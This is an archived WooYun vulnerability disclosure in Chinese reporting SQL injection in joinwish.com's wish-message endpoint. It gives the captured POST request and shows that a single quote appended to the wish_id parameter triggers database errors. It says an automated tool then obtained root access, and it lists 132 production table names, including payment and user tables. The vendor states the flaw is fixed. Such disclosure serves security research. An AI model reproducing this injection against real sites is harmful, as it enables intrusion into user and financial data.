乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-19: 细节已通知厂商并且等待厂商处理中 2013-08-20: 厂商已经确认,细节仅向厂商公开 2013-08-30: 细节向核心白帽子及相关领域专家公开 2013-09-09: 细节向普通白帽子公开 2013-09-19: 细节向实习白帽子公开 2013-10-03: 细节向公众公开
看见你们发礼物了,来求个礼物!
1.登录后对某个用户的愿望点击祝福;
2.填写任意祝福内容,点击提交并抓包;
3.此时抓包会抓到2个post请求数据,第一个忽略掉,我们来看第二个抓到的请求数据;
POST /wishservice/add_wish_msg HTTP/1.1Host: www.joinwish.comUser-Agent: Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://www.joinwish.com/wish/show/id/1432Content-Length: 24Cookie:Connection: keep-alivePragma: no-cacheCache-Control: no-cachewish_id=1432&content=123
4.这里发现在wish_id参数后加上一个',系统返回了数据库的错误信息,当然还有网站的绝对路径信息,但是这些信息我们在网页上是还不见的;
5.直接使用工具跑下,得到如下信息;root权限:
数据库信息:
表信息:
Database: joinwish_product[132 tables]+------------------------------+| account_freeze_tx || account_topups || account_transfers || account_tx || account_withdraws || accounts || alipay_transfer || alipay_transfer_batch || areas || auth_group || auth_group_permissions || auth_permission || auth_user || auth_user_groups || auth_user_user_permissions || backend_tx || backends || bank_cities || bank_provinces || barcode_types || biz_card_bindings || brands || c2c_topup_requests || card_items || cities || cs_logs || cs_roles || cs_user_functions || cs_user_role_functions || cs_user_roles || cs_users || django_admin_log || django_content_type || django_session || django_site || errors || exchanges_users || favorite_wishes || gateway_audit || gateway_audit_result || gateway_order || give_user_brand || hulu_card_no_libs || invitees || merchants || mptopup_orders || offline_transfers || p2p_catalogs || p2p_comment || p2p_commodities || p2p_exchange_0 || p2p_exchange_1 || p2p_merchant || p2p_order || p2p_send_transaction || p2p_send_withdraw || p2p_settlement_payment_batch || p2p_ticket || p2p_ticket_batch || payment_card_logs || payment_channels || payment_orders || properties || provinces || public_utility_orders || refunded_transactions || settlement || settlement_detail || shopping_items || shopping_orders || terminal_requests || transaction_details || transactions || tx_types || user_addresses || user_backends || user_friends || user_mp_verify_codes || user_reg_requests || user_saved_cards || user_sessions || user_uploaded_pic_catalogs || user_uploaded_pics || user_wish_statistics || users || weibo_template || wish_albums || wish_amount_increase_logs || wish_award_logs || wish_base || wish_cash_coupons || wish_comments || wish_commodities || wish_cs_roles || wish_cs_user_functions || wish_cs_user_role_functions || wish_cs_user_roles || wish_cs_users || wish_details || wish_exchange_items || wish_exchange_tocheck_users || wish_exchange_view || wish_exchanges || wish_fans || wish_gifts || wish_give_logs || wish_give_tx || wish_guest_infos || wish_hp_use_logs || wish_join_requests || wish_members || wish_mer_exchange || wish_merchants || wish_msgs || wish_pdts || wish_praise_statistical || wish_prop_logs || wish_pub_logs || wish_solutions || wish_themes || wish_transfers || wish_user_banding || wish_user_guides || wish_user_notification || wish_user_verification || wish_users || wish_visit_logs || wishes || withdraw_fee_rate || ym_sms || ym_sms_mo || ym_sms_mt |+------------------------------+
5.测试到这里就差不多了,求礼物!!!
见详细说明
过滤
危害等级:中
漏洞Rank:10
确认时间:2013-08-20 10:13
该漏洞已与昨日修复
暂无
